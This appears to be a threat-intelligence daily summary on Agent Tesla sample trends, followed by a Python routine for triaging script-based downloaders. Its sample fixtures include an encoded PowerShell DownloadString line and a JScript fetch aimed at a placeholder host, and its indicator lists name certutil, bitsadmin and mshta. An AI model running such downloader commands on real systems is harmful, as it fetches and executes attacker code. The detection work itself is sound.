Daily Summary
Agent Tesla sample volume reached 60 new samples on 2026-05-03, a 6% decrease from the 7-day average of 64. Activity remains stable with no significant spike or drop, indicating sustained operational tempo from threat actors distributing this information stealer.
New Samples Detected
Script-based delivery dominates today’s sample set. PowerShell (.ps1) files lead with 19 samples, followed by executable (.exe) files with 14, and JavaScript (.js) with 13. Batch files (.bat) and dynamic-link libraries (.dll) each contributed 3 samples, while compressed archives (.rar, .zip, .gz, .tar) total only 5. Compared with the prior 7-day period, which relied more heavily on executable payloads, the packaging mix shifts slightly toward script-based execution via PowerShell and JavaScript.
Distribution Methods
The heavy representation of .ps1, .js, and .cmd files suggests email-based campaigns with malicious attachments remain the primary delivery method. PowerShell scripts likely execute in-memory to download the final payload, while JavaScript files may be disguised as invoices or documents. Archives (.rar, .zip) remain a secondary vector for compressing executables or DLLs to evade email gateways.
Detection Rate
Antivirus detection rates are not directly provided, but the presence of script-based samples (PowerShell, JavaScript) indicates potential for social-engineering-led bypass of static signatures. Immediate sandbox analysis of the 60 new IOCs is recommended to assess their evasion capabilities.
C2 Infrastructure
No new C2 servers or IPs were recorded today. Existing infrastructure appears stable with no geolocation shifts, suggesting threat actors are reusing known endpoints for staging and data exfiltration.
7-Day Trend
Today’s count of 60 samples aligns closely with the 7-day average of 64, indicating a steady flow of Agent Tesla variants. Activity is neither ramping up nor notably declining, suggesting a consistent campaign rhythm.
Security Analysis
A non-obvious observation is the intentional variety in file types: spreading samples across .ps1, .exe, .js, .bat, .dll, and archives forces defenders to maintain diverse detection rules. Many SOCs prioritize executable detection, leaving script-based initial access under-monitored. Actionable recommendation: enable AMSI (Antimalware Scan Interface) logging for PowerShell, JavaScript, and batch files, and apply YARA rules that flag script-based downloaders for Agent Tesla based on common OLE or base64 patterns. This reduces the dwell time before DLL or EXE payloads execute.
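The recommendation above is to flag script-based downloaders on base64 patterns rather than waiting for the EXE or DLL stage. The following Python triage routine is an added example, not code from the report or from any vendor rule set: it runs a simple indicator check over a constructed set of .ps1, .js and .bat files, decodes long base64 runs (trying UTF-16LE first, because PowerShell's -EncodedCommand uses that encoding) so that indicators hidden inside a blob are still seen, and tallies the sample set by extension the way the summary above does. The indicator lists, the 40-character base64 threshold and the "two indicators in the clear, or one hidden" flagging rule are assumptions chosen for the example; a production YARA rule would be tuned against real samples.

```python
import base64
import re

# Constructed sample set for this example (not real Agent Tesla samples).
# The first .ps1 carries a -EncodedCommand blob (base64 over UTF-16LE text),
# so its downloader indicators are only visible after decoding.
_ENCODED = base64.b64encode(
    "(New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage2')"
    .encode("utf-16le")
).decode("ascii")

SAMPLES = {
    "invoice_0503.ps1": "powershell -NoProfile -WindowStyle Hidden -EncodedCommand " + _ENCODED,
    "document_scan.js": 'var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
                        'x.open("GET", "http://placeholder.invalid/doc", false);\n',
    "cleanup.bat": "@echo off\r\ndel /q %TEMP%\\*.log\r\n",
    # A benign admin script with a single indicator in the clear (should not flag).
    "fetch_tool.ps1": "Invoke-WebRequest -Uri https://placeholder.invalid/tool.zip -OutFile tool.zip\n",
}

# Strings script-based downloaders commonly contain, keyed by file type.
# Assumption for this example; not the report's own rule content.
DOWNLOADER_INDICATORS = {
    ".ps1": ["DownloadString", "DownloadFile", "Invoke-WebRequest",
             "Invoke-Expression", "Net.WebClient"],
    ".js": ["ActiveXObject", "MSXML2.XMLHTTP", "ADODB.Stream", "WScript.Shell"],
    ".bat": ["powershell", "certutil", "bitsadmin", "mshta"],
}

# A run of 40+ base64-alphabet characters is long enough to hide a command.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _is_plain_text(s):
    """True if every character is printable ASCII or ordinary whitespace."""
    return all(32 <= ord(c) < 127 or c in "\r\n\t" for c in s)


def decode_base64_layers(text):
    """Return the readable text recovered from each base64 run in `text`.

    UTF-16LE is tried first (PowerShell -EncodedCommand); UTF-8 covers
    FromBase64String-style blobs. Runs that do not decode to text are skipped.
    """
    layers = []
    for match in BASE64_RUN.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        for encoding in ("utf-16le", "utf-8"):
            try:
                decoded = raw.decode(encoding)
            except UnicodeDecodeError:
                continue
            if _is_plain_text(decoded):
                layers.append(decoded)
                break
    return layers


def triage_script(filename, content):
    """Check one script for downloader indicators in clear text and in decoded base64."""
    ext = filename[filename.rfind("."):].lower() if "." in filename else ""
    indicators = DOWNLOADER_INDICATORS.get(ext, [])
    decoded_layers = decode_base64_layers(content)

    def find(layer):
        low = layer.lower()  # PowerShell and cmd are case-insensitive
        return {i for i in indicators if i.lower() in low}

    clear_hits = find(content)
    hidden_hits = set()
    for layer in decoded_layers:
        hidden_hits |= find(layer)

    # Flag when an indicator only appears after decoding (static string
    # matching would have missed it), or when two or more appear in the clear.
    suspicious = bool(hidden_hits) or len(clear_hits) >= 2
    return {
        "file": filename,
        "extension": ext,
        "decoded_layers": len(decoded_layers),
        "indicators": sorted(clear_hits | hidden_hits),
        "hidden_indicators": sorted(hidden_hits),
        "suspicious": suspicious,
    }


def triage_all(samples=SAMPLES):
    return [triage_script(name, body) for name, body in samples.items()]


def count_by_extension(results):
    """Per-extension tally, mirroring the daily file-type breakdown."""
    counts = {}
    for r in results:
        counts[r["extension"]] = counts.get(r["extension"], 0) + 1
    return counts


if __name__ == "__main__":
    results = triage_all()
    for r in results:
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{r['file']:18} {flag:10} indicators={r['indicators']} "
              f"decoded_layers={r['decoded_layers']}")
    print("by extension:", count_by_extension(results))
```

The encoded .ps1 is flagged only because the blob was decoded; the .js is flagged on two clear-text indicators; the benign Invoke-WebRequest script is left alone, which is the trade-off a YARA rule on base64 patterns has to make between catching in-memory downloaders and not paging on routine administration.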